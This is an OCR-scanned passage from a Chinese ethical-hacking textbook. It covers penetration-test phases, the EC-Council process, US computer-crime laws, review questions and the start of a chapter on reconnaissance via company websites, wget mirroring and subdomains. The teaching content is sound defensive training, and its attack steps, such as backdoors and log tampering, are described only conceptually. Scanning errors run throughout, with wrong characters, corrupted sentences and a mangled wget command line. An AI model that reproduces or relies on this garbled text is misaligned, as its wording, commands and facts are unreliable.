DNS 信 息 确定 诸如 Whois 查 询 、DNS 查 询 、 网 络 和 组 织 查 询 等 信息 。 

行业 系统 的 共同 缺陷 ”定位 当前 基础 设施 中 存在 的 或 可 能 存在 的 有 助 于 后 续 开 展 攻 击 


与 攻击 者 换 位 思考 


在 此 给 初 入 道德 黑客 和 渗透 测试 领域 的 人 员 提 一 上 扣 建 议 ， 那 就 是 跳出 传统 方式 
下 培养 出 的 思维 案 白 。 在 学 习 新 技术 时 ， 壬 试 思考 它 可 能 的 新 有 用法。 例如， 能 否 清 
妹 一 台 设 备 并 在 它 上 面 安 北 Linux 操 作 系 统 ? 能 否 避 开设 备 的 安全 机 制 ， 以 强制 其 
允许 安 半 和 配置 其 他 软 硬 件 ? 试看 训练 目 己 像 那 些 试 图 破坏 或 镭 取 东西 的 人 一 样 思 
考 。 作 为 一 名 渗透 调试 员 ， 应 该 以 恶意 思考 ， 以 善意 行事 。 


4.3.2 扫 摘 与 枚 举 


收集 完 目标 信息 之 后 ， 即 可 进入 下 一 阶段 : 扫描 与 枚 举 。 虽 然 一 般 可 期 待 此 时 已 收集 
大 量 有 用 信息 ， 但 也 可 能 会 发 现 收集 到 的 信息 仍然 不 够 充分 。 在 这 种 情况 下 ， 可 能 需要 返 
回 上 一 阶段 继续 挖掘 更 多 信息 ， 也 可 以 决定 继续 扫描 而 不 是 回头 弥补 知识 的 欠缺 。 随 着 能 
力 不 断 得 到 锻炼 以 及 经 验 的 增加 ， 你 会 发 现 自己 培养 了 一 种 鉴别 事物 的 能 力 。 

扫描 包括 ping 扫 描 、 端 口 扫描 和 漏洞 扫描 。 枚 举 是 从 发 现 的 入 口 信息 和 在 扫描 过 程 中 
发 现 的 信息 中 提取 有 用 信息 的 过 程 ， 如 用 户 名 、 共 享 数 据 、 组 信息 等 。 这 两 部 分 内 容 将 在 
第 6 章 中 介绍 。 


4.3.3 ”渗透 目标 


完成 目标 扫描 并 确定 了 系统 的 入 口 和 漏洞 后 ， 即 可 开展 针对 目标 的 实际 渗透 工作 。 本 
步骤 是 为 了 利用 系统 缺陷 以 攻陷 系统 并 获得 一 定 程度 的 访问 权限 。 

应 当 从 情报 搜集 的 结果 中 仔细 确定 合适 的 渗透 目标 。 需 要 记 住 的 是 ， 在 上 一 步 中 可 能 
会 及 现 许 多 易 受 攻击 的 系统 ， 因 此 现 阶段 面临 的 挑战 是 找到 可 利用 或 是 包含 有 价值 目标 的 
系统 。 例 如 ， 在 扫描 某 个 网 络 的 时 候 ， 可 能 会 找到 100 个 系统 ， 其 中 4 个 是 服务 器 ， 其 余 都 
是 更 面 系统 。 虽 然 果 面 系统 可 能 也 是 有 趣 的 目标 ， 但 是 至 少 在 开始 时 ， 应 该 将 注意 力 放 在 
服务 器 上 并 将 果 面 系统 作为 次 要 目标 。 
在 选择 好 合适 的 目标 之 后 ， 就 可 尝试 运用 你 的 技能 和 知识 来 攻破 目标 。 在 一 种 攻击 最 
终 取得 成 功 之 前 ， 往 往 要 尝试 很 多 种 不 同 的 攻击 方法 或 手段 。 记 住 ， 对 一 个 系统 进行 扫描 
并 将 其 评估 为 存在 攻 个 漏洞 决 不 意味 着 该 漏洞 实际 上 能 被 利用 ， 应 该 考虑 清楚 哪 种 类 型 的 
攻击 可 能 会 成 功 ， 以 及 在 攻击 目标 时 采用 的 攻击 方法 顺序 。 

在 本 阶段 可 能 用 到 的 攻击 手段 包括 : 
密码 破解 
流量 咒 探 
会 话 劫持 
暴 力 攻击 
中 间 人 攻击 

本 书 中 已 涵盖 上 述 攻击 方式 ， 可 借 此 熟悉 每 一 种 操作 以 及 它们 的 使 用 方法 。 然 而 ， 要 
记 住 还 有 很 多 别 的 可 以 利用 的 攻击 方法 和 技巧 ， 其 中 许多 将 在 你 的 工作 实践 和 经 验 积累 中 
学 到 。 


使 用 自动 化 工具 与 人 工 方法 
目 动 化 工具 可 用 于 识别 环境 中 可 能 存在 的 一 些 禹 见 的 、 众 所 周知 的 弱点 。 这 些 
工具 通常 需要 定期 更 新 版 本 ， 以 捕获 最 新 的 弱点 。 
以 下 是 选择 一 个 优良 的 渗透 工具 的 方法 : 
@ 它 应 该 易于 部 署 、 配 置 和 使 用 。 
@ 瑟 应 根据 漏洞 需要 立即 修复 的 急迫 程度 对 其 进行 分 类 。 
二 
S 
忆 


它 应 能 够 目 动 验证 漏洞 。 
它 应 重新 验证 之 前 发 现 的 漏洞 。 
它 应 能 生成 详细 的 漏洞 报告 和 日 志 。 
然而 ， 目 动 化 工具 也 具备 一 些 局 限 ， 例 如 产生 假 阳 性 结 采 和 漏 报 已 知 的 弱点 。 
它们 还 可 能 造成 大 量 网 络 活动 ， 甚 至 因 其 结果 导致 虚假 的 信任 感 。 


由 于 目 动 化 工具 无 法 定位 所 有 的 沟 在 弱点 ， 因 此 对 人 工 调 试 的 需求 就 变 得 显 而 
易 见 。 具 备 适 当 的 技能 和 受过 知识 培训 的 人 员 可 以 找到 大 量 目 动 化 手段 找 不 到 的 弱 
点 。 但 是 ， 人 工 训 试 的 缺点 在 于 大 过 耗 时 ， 因 而 一 个 人 无 法 在 合理 的 时 间 内 检查 所 
有 涤 在 漏 筒 。 

那么 ， 最 好 的 方法 是 什么 ”对 于 很 多 测试 人 员 而 言 ， 最 好 的 方法 就 是 综合 使 
用 两 种 方法 。 用 目 动 化 测试 的 方法 找到 漏洞， 再 用 人 工 方法 对 具体 泌 洞 进行 深入 
调查 。 


4.3.4 维持 访问 


“维持 访问 ”步骤 用 于 保留 在 获取 访问 权时 在 系统 上 开局 的 入 口 。 该 步骤 假定 将 来 有 
继续 进行 攻击 或 者 回来 执行 其 他 操作 的 需要 。 需 要 记 住 的 是 ， 目 标 系 统 的 所 有 者 会 (至 
少 是 应 该 会 ) 试 图 阻止 对 系统 的 访问 ， 同 样 也 会 尝试 终止 访问 。 第 9 章 中 介绍 了 该 步骤 的 
内 容 。 


4.3.5 ”隐藏 痕迹 
隐藏 痕迹 也 是 本 步骤 的 重要 部 分 ， 因 为 它 有 助 于 隐藏 行为 的 证 据 并 对 抗 系统 所 有 者 的 


检测 和 删除 操作 。 留 下 的 证 据 越 少 或 者 隐藏 得 越 深 ， 防御 方 就 越 难 阻止 入 侵 行为 。 要 了 解 
更 多 信息 ， 请 参阅 第 12 章 。 


4.3.6 ”记录 测试 结果 


完成 上 述 任务 之 后 ， 下 一 步 就 是 为 客户 生成 一 个 报告 。 该 文档 称 为 风险 缓解 计划 。 根 
据 具 体 情 况 和 客户 需求 ， 该 报告 可 以 采用 多 种 形式 ， 下 文 是 一 些 其 中 必须 包含 的 信息 和 一 


种 参考 格式 。 
报告 应 以 概述 渗透 测试 的 过 程 开始 。 该 概述 应 简洁 明了 地 说 清楚 测试 期 间 发 生 的 事 


情 ， 而 不 壮 述 技术 细节 。 接 下 来 应 该 分 析 测 试 期 间 发 现 了 哪些 漏 筒 。 漏 洞 应 以 茶 种 可 突出 
其 严重 程度 的 方式 进行 排序 ， 例 如 关键 、 重 要 以 及 低 危 险 等 。 漏 洞 分 级 工作 做 得 越 好 ， 越 
能 帮助 客户 确定 应 在 哪里 投入 时 间 和 精力 以 解决 它们 。 
报告 中 也 应 包含 如 下 内 容 : 
每 一 次 渗透 成 功 场 景 的 总 结 
渗透 测试 期 间 收 集 到 的 所 有 信息 的 详细 列表 
找到 的 所 有 漏洞 的 详细 列表 
拉 述 发 现 的 所 有 漏洞 


解决 所 发 现 漏洞 的 建议 和 技术 

男 外 ， 笔 者 会 把 给 客户 的 报告 分 成 两 部 分 一 一 技术 性 不 强 的 摘要 和 附录 ， 并 先 问 客 户 
汇报 摘要 。 人 然后 将 相关 的 技术 数据 作为 报告 附录 ， 以 备 客 户 在 需要 时 审查 。 

在 茶 些 情况 下 ， 客 户 会 要 求 将 茶 种 特定 格式 作为 他 们 所 要 求 的 测试 的 直接 或 间接 条 
件 。 例 如 ， 为 了 满足 文 付 卡 行业 (PCD 标 准 而 进行 的 测试 中 ， 客 户 会 要 求 茶 种 格式 以 符合 
特定 标准 。 这 同样 适用 于 与 HIPAA 标 准 和 其 他 标准 相关 的 需求 。 一 定 要 询问 客户 是否 有 特 
定格 式 需 求 ， 或 者 是 可 以 目 行 决定 。 

为 了 使 报告 和 文档 的 编写 过 程 更 加 人 简单， 本 书 强 烈 建议 测试 团队 在 渗透 测试 过 程 中 
同心 协力 ， 清 晰 一 致 地 记录 测试 过 程 和 结果 。 如 果 不 擅长 记录 ， 强 烈 建议 你 培养 这 项 技能 
并 购买 或 者 开发 一 个 好 的 报表 系统 (在 本 书 的 其 他 地 方 会 更 加 全 面 地 讨论 )， 以 减轻 记录 负 
担 。 文 档 的 缺失 不 仅 会 带 来 麻烦 ， 而 且 也 可 能 在 测试 数据 中 留 下 明显 漏 调 。 

具体 细节 请 参阅 第 10 章 。 


清理 

在 上 述 所 有 工作 完成 后 ， 由 于 在 渗透 测试 中 的 行动 所 造成 的 后 果 ， 可 能 需要 进 
行 一 些 清理 工作 。 应 对 文档 中 记录 的 所 有 行为 进行 复 得 ， 并 再 次 确认 是 否 有 需要 撤 
销 或 修复 的 操作 。 清 理 的 目标 是 确保 网 络 上 不 存在 被 攻陷 或 削弱 而 可 能 直接 影 啊 网 
络 安全 性 的 主机 。 此 外 ， 任 何 清理 网 络 和 主机 的 操作 均 应 由 被 测 组 织 方 的 IT 人 员 进 
行 确认 ， 以 确保 其 满意 和 正确 。 

典型 的 清理 操作 包括 删除 系统 中 的 恶意 软件 、 删 除 测 试用 户 账 己 、 恢 复 更 改 的 
配置 ， 以 及 修复 在 测试 期 间 可 能 被 更 改 或 影响 的 其 他 任何 内 容 


4.3.7 了 解 EC-Council 流 程 


有 很 多 方法 可 以 执行 道德 黑客 工作 流程 ， 其 中 男 一 个 广为人知 的 流程 是 EC-Council 的 
道德 黑客 证 书 (Ethical Hacker Credential)。 该 流程 在 安排 上 与 上 文 介绍 的 有 少许 不 同 ， 但 总 
体 而 言 是 一 样 的 。 本 书 在 此 介绍 EC-Council 流 程 ， 主 要 是 笔者 强烈 认为 ， 了 解 自己 具备 的 
选择 是 一 个 渗透 测试 人 员 能 否 成 功 的 关键 。 

以 下 是 EC-Council 流 程 的 各 个 阶段 ， 可 供 参考 。 

踩点 (footprinting) ”该 阶段 中 ， 攻 击 方 主要 是 在 后 续 阶 段 使 用 主动 方法 之 前 先 使 用 被 
动 方法 从 目标 获取 信息 。 通 第 应 尽量 避免 与 目标 之 间 的 交互 ， 以 避免 被 目标 检测 到 并 引 
起 其 对 攻击 的 警觉 。 有 很 多 方法 可 以 执行 该 任务 ， 包 括 Whois 查 询 、Google 搜 索 、 职 位 搜 
索 、 讨 论 组 等 其 他 方法 。 

扫描 ”在 第 二 阶段 中 ， 攻 击 方 使 用 踩点 阶段 中 收集 的 信息 ， 以 大 大 提升 攻击 目标 的 精 
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度 。 这 个 阶段 的 思路 是 基于 前 一 阶段 的 信息 进行 处 理 ， 以 避免 磊 夫 心态 并 因 无 头 苑 蝇 般 乱 
撞 而 触发 警报 。 扫 描 是 指 执行 png 扫描、 端口 扫描 、 观 察 设施 以 及 其 他 类 似 任务 。 

枚 举 ， 接 下 来 的 此 阶段 是 从 扫描 阶段 的 发 现 中 抽取 更 为 详细 的 信息 ， 并 确定 其 有 用 
性 。 可 将 在 前 一 阶段 收集 的 信息 想象 为 经 过 走廊 逐一 扭 动 门 把 手 ， 试 验 并 记录 其 能 否 转 
动 。 东 个 门 没 锁 并 不 意味 看 门 里 有 什么 有 价值 之 物 。 而 在 本 阶段 中 ， 就 是 真正 检查 门 后 是 
售 藏 有 有 价值 的 东西 。 这 个 阶段 的 结果 可 能 包括 一 个 用 户 名 、 组 、 应 用 、banner 设 置 、 审 
计 信 息 以 及 其 他 类 似 信息 的 列表 。 

系统 攻击 ” 枚 举 阶段 之 后 ， 即 可 根据 发 现 的 信息 计划 和 执行 攻击 操作 。 例 如 ， 基 于 枚 
举 阶段 发 现 的 用 户 账户 选择 用 于 攻击 的 账户 。 同 样 ， 可 以 基于 从 应 用 或 服务 的 banner 检 索 
中 发 现 的 服务 信息 开始 构造 攻击 。 

提 权 ”如果 攻击 成 功 ， 攻 击 者 即 可 开始 尝试 获取 授予 高 特权 级 账户 (高 于 最 初 入 侵 账 
户 ) 的 权限 。 对 于 一 个 经 验 丰 寅 的 攻击 者 而 言 ， 能 做 到 从 诸如 访客 账户 这 样 的 低级 账户 一 
路 提升 到 管理 员 或 者 系统 级 访问 的 权限 。 

隐藏 痕 迹 ”本 阶段 中 ， 攻 击 者 会 用 尽 一 切 办 法 清除 他 们 进入 系统 的 证 据 。 具 体 行动 包 
括 对 日 志文 件 的 删除 、 更 改 以 及 其 他 操作 ;删除 文件 ， 以 及 破坏 其 他 可 能 留 下 让 系统 所 有 
者 轻易 确定 发 生 过 攻击 的 有 价值 线索 的 证 据 。 可 以 如 此 想象 : 和 破 窗 而 入 相 比 ， 援 锁 进 入 
屋子 的 线索 会 少 得 多 或 者 不 明显 得 多 。 前 者 房 主 可 能 会 寻找 不 速 之 客 市 走 了 什么 ， 而 后 者 
则 可 能 发 现时 痕迹 已 烟消云散 。 

维持 访问 ” 植 入 后 门 就 是 作为 攻击 者 留 下 一 些 可 让 你 有 需要 时 还 能 再 次 进入 的 东西 。 
它们 包括 特殊 账户 、 特 洛 伊 木马 以 及 其 他 很 多 东西 。 从 本 质 上 讲 ， 该 做 法 主要 是 为 了 保护 
本 流程 中 前 期 的 成 果 ， 以 备 稍 后 需要 再 次 访问 的 情况 。 


4.4 依法 测试 


你 还 需要 熟悉 法 律 并 知道 它 对 你 的 行为 有 何 影 响 。 对 法 律 无 知 或 理解 不 透 不 但 是 个 坏 
主意 ， 而 且 可 能 会 让 你 很 快 丢 了 工作 甚至 银 匀 入 狱 。 事 实 上 ， 由 于 Internet 的 高 分 布 特性 ， 
在 某 些 情况 下 ， 这 个 徘 行 甚 至 可 能 令 你 在 多 个 不 同 的 州 、 县 甚至 国家 的 司法 管辖 区 内 遭 到 
起 诉 。 

因此 ， 需 要 始终 保持 高 度 警 惕 以 确保 安全 ， 避 免 触犯 法 律 。 以 下 是 你 应 具备 基本 认识 
的 法 律 、 法 规 和 行政 命令 : 

1974 年 美国 隐私 法 案 (U.S. Privacy Act) 该 法 案 管理 美国 政府 对 个 人 信息 的 处 理 。 

1984 年 美国 医疗 计算 机 犯罪 法 案 (U.S. Medical Computer Crime Act) 该 法 案 处 理 非 
法 访问 或 复 改 医疗 数据 。 
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1986 年 (1996 年 修订 ) 美 国 计 算 机 欺诈 和 滥用 法 到 (U.S. Computer Fraud and Abuse 
Act) 该 法 案 涉 及 自 改 、 破 坏 或 销毁 联邦 政府 计算 机 中 的 信息 ， 以 及 影响 到 路 州 或 国外 商 
业 活 动 的 计算 机 密码 的 非法 交易 ， 或 者 允许 未 经 授权 访问 政府 计算 机 等 问题 。 

1986 年 美国 电子 通信 隐私 法 案 (U.S. Electronic Communications Privacy Act) 该 法 
案 茶 止 在 未 区 分 私人 或 公共 系统 的 情况 下 饭 听 或 拦截 信息 内 容 。 

1994 年 美国 通信 协助 执法 法 案 (U.S. Communications Assistance for Law 
Enforcement Act) ”该 法 案 要求 所 有 通信 运营 商 具 备 监 听 能 力 。 

1996 年 美国 Kennedy-Kassebaum 健 康 保 险 流 通 与 责任 法 案 (Health Insurance and 
Portability Accountability Act，HIPAA) 该 法 案 涉及 美国 个 人 医疗 保健 信息 隐私 和 医保 计 
划 可 转移 性 的 问题 (2000 年 12 月 增加 了 其 他 要 求 )。 

1996 年 美国 国家 信息 基础 设施 保护 法 案 (U.S. National Information Infrastructure 
Protection Act) “该 法 案 1996 年 10 月 作为 104-294 公 法 的 一 部 分 颁布 ; 它 修订 了 “计算 机 其 
诈 和 滥用 法 案 ”， 后 者 已 被 列 入 美国 法 典 第 18 章 第 1030 节 。 该 法 案 处 理 数据 与 系统 的 机 密 
性 、 完 整 性 和 可 用 性 保护 问题 。 该 方案 则 在 鼓励 其 他 国家 采用 类 似 框架 ， 为 现存 的 全 球 信 
恩 基 础 设施 制定 更 加 统一 的 解决 计算 机 犯罪 的 方法 。 

Sarbanes-Oxley(SOX) 法 案 ”在 安然 (Enron) 和 MCI Worldcom 等 公司 假 账 丑闻 的 影响 
下 ， 在 美国 以 SOX 法 案 形式 提出 新 的 联邦 标准 以 打击 类 似 犯 罪 。 

联邦 信息 安全 管理 法 案 (Federal Information Security Management Act ，FISMA) 
该 法 案 要 求 每 个 美国 联邦 机 构 创 建 、 记 录 并 完善 信息 安全 政策 。 


4.5 本草 小 绪 


渗透 测试 通 营 以 对 项 目 进 行 广泛 而 深入 的 范围 界定 和 规划 开始 。 规 划 过 程 旨 在 确定 测 
试 的 总 体 目标 ， 以 及 如 何 执行 测试 。 渗 透 测试 人 员 和 客户 需要 周到 仔细 地 考虑 测试 目标 ， 
以 确保 其 切实 而 适当 。 

在 规划 完成 并 侈 赣 合 同 获 得 测试 许可 后 ， 即 可 进行 测试 ， 测 试 通常 以 收集 后 期 用 于 网 
络 扫 摘 以 及 更 具 攻 击 性 行动 的 信息 开始 。 在 完成 有 折 有 的 渗透 测试 并 获得 所 有 的 漏洞 相关 信 
恩 后 ， 通 常 应 生成 一 个 报告 。 报 告 中 应 清楚 记录 采取 的 所 有 行动 、 行 动 结果 、 解 释 和 适当 
的 建议 。 

渗透 测试 人 员 还 需要 了 解 对 测试 和 他 们 上 自身 活动 产生 影 啊 的 不 同类 型 的 法 律 。 测 试 人 
员 应 当 确 保 他 们 的 行为 受 法 律 的 保护 ， 并 且 应 该 考虑 与 外 部 法 律 协 助 方 签订 合同 ， 以 确保 
目 己 与 客户 的 需求 都 得 到 满足 。 


1. 对 于 渗透 测试 人 员 而 言 ， 渗 透 测 试 方法 学 有 何 用 途 ? 

2. 法 律 会 在 何 时 影响 到 渗透 测试 流程 的 类 型 ? 

3. 为 何不 同 渗透 测试 方法 学 之 间 的 步骤 会 有 所 不 同 ? 

4. 界定 渗透 测试 范围 的 目的 是 什么 ? 

5. 为 何 当 渗 透 测试 人 员 未 签订 合同 就 进入 某 个 网 络 时 ， 可 能 被 控 入 侵 或 发 生 其 他 非法 


情报 收集 


当 合同 尘埃 落 定 后 ， 就 应 着 手 开 展 对 目标 的 情报 收集 工作 。 人 情报 收集 是 一 个 严谨 的 过 
程 ， 通 过 该 过 程 可 找到 可 能 对 后 续 测 试 阶段 有 用 的 信息 。 由 于 我 们 生活 在 信息 时 代 ， 因 此 
虽然 完成 情报 收集 工作 需要 一 些 时 间 ， 但 是 这 些 时 间 将 物 有 所 值 ， 因 为 如 果 采 用 恰当 的 
工具 ， 提 出 恰当 的 问题 并 且 耐心 寻找 ， 基 本 上 就 能 找到 希望 知道 的 任何 人 或 者 公司 的 任何 
信息 。 


本 章 将 学 习 : 

找到 网 站 的 旧版 本 

利用 搜索 引擎 进行 黑客 活动 

以 员工 为 目标 并 发 现 其 定位 信息 
调查 社交 网 站 

调查 财务 和 职位 招聘 信息 

搜索 邮件 信息 

使 用 Whois 提 取 技 术 信息 


ER 


5.1 情报 收集 倍 介 


对 目标 的 情报 收集 有 助 于 改进 后 续 的 渗透 步 又 。 在 该 过 程 中 ， 需 要 使 用 尽 可 能 多 的 合 
理 方 法 观察 和 收集 目标 信息 。 应 该 特别 注意 任何 后 续 可 能 用 到 的 信息 (虽然 需要 积累 一 定 
经 验 才能 练 就 能 够 判断 信息 是 否 有 用 的 “火眼金睛 ”)。 最 终 ， 应 能 挑选 出 可 能 对 后 续 渗 
透 测试 过 程 有 帮助 的 信息 。 在 练 就 能 够 发 现 有 用 信息 的 “火眼金睛 ”之 前 ， 应 仔细 检查 正 
在 揭示 的 信息 及 其 中 包含 的 细 市 。 


就 客户 的 立场 而 言 ， 对 其 基础 设施 和 业务 运营 方面 的 情报 收集 可 能 造成 几 种 负 
而 影响 : 


商业 损失 “如 果 消 费 者 或 供应 商 发 现 自己 的 信息 或 数据 没有 得 到 有 效 的 保护 ， 
那么 很 容易 导致 他 们 失去 信任 ， 并 转投 他 人 。 

信息 泄露 ”信息 泄露 包括 有 意 或 无 意 公开 的 信息 ， 例 如 项 目 信息 、 员 工 数据 、 
个 人 信息 、 财 务 信息 以 及 其 他 一 些 可 能 的 信息 。 
粒 的 情况 ， 它 意味 着 本 应 被 保密 的 信息 公开 


隐私 泄露 ”隐私 泄露 是 一 种 非 背 类 
了 。 隐 私 泄露 最 大 的 威胁 不 仅仅 是 失去 相关 方 信任 ， 还 包括 隐私 泄露 导致 的 法 律 
后 条 。 

企业 间谍 ”公司 的 那些 资金 充足 并 且 充 满 好 奇 心 的 苑 争 对 于 在 
奶 时 ,同样 能 够 发 现 渗 透 测 试 者 在 踊 点 过 程 中 发 现 的 信息 。 

塞 倪 失 马 硼 知 非 福 ， 上 述 情况 同样 意味 者 有 春 丰 是 的 资源 可 用 于 获取 目标 信 
号 。 这 些 信息 有 符 于 你 使 用 它们 ， 针 对 茶 个 目标 进行 研究 ， 并 通过 综合 分 析 收 集 的 
计 姑 摘 绘 出 受害 者 (在 渗透 测试 中 称 为 评估 目标 ) 的 概貌 。 


调查 公司 详细 信 


一 般 而 言 ， 在 调查 客户 时 ， 应 从 多 个 不 同 来 源 收 集 尽 可 能 多 的 信息 。 我 们 可 以 期 符 能 
够 找到 大 量 与 目标 相关 的 信息 ， 包 括 : 
@ 技术 信息 ， 如 操作 系统 信息 、 网 络 信 息 、 存 在 的 应 用 程序 、IP 地 址 范围 ， 甚 至 设 
备 信息 。 此 外 ， 还 很 可 能 能 够 定位 网 络 摄像 头 、 报 警 系统 、 移 动 设备 等 。 
@ 管理 信息 ， 如 组 织 结 构 、 公 司 政 集 、 招 聘 程序 、 员 工 详细 信息 、 电 话 籍 、 供 应 商 
信息 等 。 
@ 物理 细节 ， 如 位 置 数据 、 设 施 数据 、 人 员 细 节 以 及 与 个 人 的 社交 互动 等 。 很 可 能 
通过 简单 的 监控 或 者 使 用 Google 街 景 之 类 资源 ， 即 可 碍 看 设施 的 处 所 细节 信息 ， 
了 解 区 域 的 布局 。 
在 这 些 类 别 中 存在 大 量 可 发 掘 的 信息 。 问 题 在 于 其 中 有 多 少 有 用 部 分 ， 以 及 会 忽略 多 
少 信息 。 事 实 上 ， 要 做 好 承受 “信息 超载 ”的 准备 ， 因 为 收集 到 的 数据 量 多 到 难以 (如 果 
不 是 完全 无 法 ) 进 行 有 效 处 理 ， 令 人 不 堪 重 负 。 
需要 谨 记 ， 过 多 的 信息 也 可 能 市 来 危险 。 很 容易 被 发 现 的 东西 所 迷惑 ， 而 最 终 导 致 收 
集 的 信息 坚 无 用 处 。 应 当 吸 取 情 报 收集 和 后 续 阶 段 的 经 验 ， 学 习 如 何 辨别 信息 是 否 有 用 。 


5.1.2 ”收集 万 法 分 类 


在 信息 收集 阶段 ， 应 当 能 够 制定 攻击 策略 并 了 
可 分 为 三 类 。 


铎 组 织 发 布 的 信息 。 信 息 收集 方法 通常 
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被 动 收集 ”被动 方 法 是 指 与 目标 无 相互 作用 或 接触 的 方法 。 通 过 不 与 目标 接触 ， 和 希望 
位 量 少 或 不 同 目 标 提供 将 进行 的 攻击 的 迹象 。 

主动 收集 给 公司 、 服 务 台 、 员 工 或 其 他 人 员 打 电话 属于 此 类 方法 。 任 何 要 求 主 动 接 
独 目 标的 方法 都 属于 主动 收集 。 

公开 源 情 报 (Open Source Intelligence，OSINT) 收 集 ”在 情报 收集 手段 中 ， 公 开源 信 
恩 收 集 或 被 动 信息 收集 是 攻击 性 最 低 的 。 大 臻 上， 该 过 程 依赖 于 从 那些 对 公众 可 用 的 开放 
资源 中 获取 信息 。 可 能 的 信息 源 包 括 报 纸 、 网 站 、 讨 论 组 、 新 闻 稿 、 电 视 、 社 交 网 络 、 博 
客 以 及 无 数 的 其 他 来 源 。 


EE 


5.2 ”检查 公司 网 站 


收集 目标 信息 的 入 手 好 地 方 是 目标 目 己 的 网 站 。 网 站 体现 了 一 个 组 织 告知 公众 其 工作 
内 容 、 存 在 原因 以 及 其 他 很 多 信息 的 方式 。 一 个 典型 的 公司 网 站 如 图 5.1 所 示 。 
Wie Ei -cE 
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图 5.1 一 个 典型 的 商业 网 站 
在 检查 网 站 时 ， 请 查找 以 下 可 能 有 用 的 信息 : 
电子 邮件 地 址 
不 仅 要 留意 一 般 的 电子 邮件 地 址 ， 还 要 留意 可 能 与 特定 个 人 或 特定 部 门 联系 的 任何 邮 
件 地 址 。 前 一 种 类 型 的 地 址 可 用 于 进行 针对 个 人 的 社会 工程 攻击 ， 例 如 网 络 钓鱼 ( 稍 后 介 
绍 )， 后 者 可 用 于 获得 关于 项 目 或 部 门 结构 的 信息 。 
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物理 地 址 

任何 物理 地 址 都 可 能 不 仅 提供 个 人 办 公 室 位 置信 息 ， 还 能 包括 某 些 功能 (例如 运输 、 
订单 处 理 ) 场 所 甚至 是 总 部 办 公 室 的 位 置 。 此 外 ， 如 果 需 要 执行 物理 安全 评估 和 渗透 ， 或 
许可 以 结合 使 用 物理 地 址 和 地 图 应 用 程序 或 是 Google 街 景 视图 ， 远 程 查看 周边 环境 ， 以 规 
划 攻 击 。 


招聘 

作为 正常 运营 的 一 部 分 ， 许 多 公司 在 其 网 站 上 发 布 职 位 信息 ， 以 吸引 新 员工 。 虽 然 发 
布 这 种 信息 的 做 法 未 必 是 个 坏 主 意 ， 但 如 果 处 理 不 当 ， 它 可 能 会 成 为 一 个 问题 。 发 布 技术 
岗位 招聘 信息 的 公司 可 能 会 发 布 诸 如 “有 Active Directory 使 用 经 验 ” 或 “Windows Server 
2012 使 用 经 验 ” 之 类 的 特殊 要 求 以 及 其 他 详细 信息 。 发 布 这 些 详细 信息 似乎 是 个 不 错 的 主 
意 ， 但 渗透 测试 者 通过 分 析 此 类 信息 ， 即 可 快速 确定 这 家 公司 拥有 哪些 技术 ， 因 为 这 是 他 
们 要 寻找 具备 相关 工作 经 验 人 员 的 唯一 原因 。 


产品 、 项 目 或 服务 信息 

虽然 不 是 关键 问题 ， 但 是 如 果 准 备 进行 社会 工程 攻击 ， 学 习 公司 业务 
以 帮助 说 服 目标 员工 ， 使 其 相信 信息 请 求 合法 。 

现在 你 已 经 大 概 了 解 要 从 网 站 上 寻找 哪些 信息 ， 问 题 是 当 网 站 很 大 时 ， 获 取 这 些 信 
息 可 能 是 非常 耗 时 的 。 幸 运 的 是 ， 有 一 些 方法 可 以 大 大 加 快 这 一 进程 ， 至 少 可 帮助 信息 
挖掘。 


和 使 用 的 术语 可 


5.2.1 名 线 但 看 网 站 


检查 网 站 是 一 个 好 主意 ， 但 如 果 可 以 在 自己 的 计算 机 上 离线 检查 会 如 何 ? 事情 会 简 
单 得 多 ， 因 为 可 以 在 文件 中 搜索 文本 字符 串 、 模 式 、 各 种 文件 扩展 名 ， 甚 至 在 某 些 情况 
下 还 能 找到 本 以 为 隐藏 的 内 容 。 能 够 执行 该 功能 的 应 用 程序 通 单 称 为 网 站 下 载 器 ， 有 时 
也 称 为 网 站 爬虫 ， 人 们 制作 了 许多 用 于 该 用 途 的 工具 。 其 中 之 一 是 基于 Windows 平 台 的 
BlackWidow， 该 工具 的 界面 如 图 5.2 所 示 。 

输入 一 个 地 址 ， 即 可 将 BlackWidow 指 辣 一 个 网 站 ， 程 序 开始 运行 后 ， 会 从 目标 上 下 
载 它 能 下 载 的 所 有 页 面 。 

BlackWidow 的 一 个 普 代 选项 是 Wget， 它 在 Linux/Unix 和 Windows 操 作 系 统 上 (虽然 还 
需要 先 下 载 该 程序 ) 均 可 使 用 。 
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图 5.2 BlackWidow 工 具 


练习 5.1: 使 用 Wget 检 索 网 站 
Wsget 是 一 个 Linux 和 Unix 平 台 通 用 的 实用 程序 ， 两 个 平台 中 都 默认 安 闭 它 。 直 到 
最 近 为 止 ， 还 没有 Weget Windows 和 洛 户 端 ， 但 问题 现在 已 得 到 解决 ， 用 Google 很 容易 
找到 一 个 该 程序 的 副本 。 
使 用 以 下 方式 将 整个 网 站 下 载 到 计算 机 上 同名 的 文件 夹 中 : 


sudo wget -m http://< website name> 


-m 选 项 代表 镜像 ， 即 “镜像 本 网 站 ”。 镜 像 是 下 载 网 站 的 为 一 种 术语 。 
如 末 要 下 载 整个 网 站 ,可 以 使 用 以 下 方式 : 


wget -TI -level=1 -p http://<website name> 


该 命令 意味 看 “下 载 网 站 上 的 所 有 丰 面 ， 额 外 问 下 递归 ( 沁 一 个 级 别 (-level = 1)， 
并 获取 组 成 每 个 页 面 (-p) 的 所 有 组 件 (如 图 像 ) 。 


5.2.2 寻找 子 域 


分 析 网 站 还 需要 考虑 另 一 件 事情 : 子 域 。 子 域 是 对 网 站 主要 名 称 的 划分 。 例 如 ， 
Microsoft.com 的 子 域 可 以 为 support.microsoft.com 或 beta.microsoft.com。 在 现实 世界 中 ， 必 
须 输 入 全 名 或 单 击 链接 才能 访问 这 些 子 域 。 

那么 ， 为 什么 一 家 公司 会 将 此 作为 标准 做 法 呢 ? 它们 这 样 做 可 能 只 是 为 了 给 不 同 的 职 
能 或 部 门 各 自控 制 的 子 站 ， 以 便 更 好 地 组 织 网 站 内 容 。 也 可 能 是 公司 将 网 站 划分 为 子 域 以 
粗略 地 “隐藏 ”内 容 ， 认 为 通过 保护 来 隐藏 信息 是 个 好 主意 (事实 并 非 如 此 )。 


要 如 何 简 单 地 找到 这 些 子 域 ? 当然 ， 可 选 的 方法 有 很 多 ， 这 里 介绍 一 种 使 用 Netcraft 
网 站 的 方法 。 后 文 还 会 再 次 介绍 Netcraft 网 站 ， 不 过 在 此 首先 学 习 利 用 它 的 一 项 功能 来 得 
找 子 域 。 


练习 5.2: 使 用 Netcraft 找 介子 域 
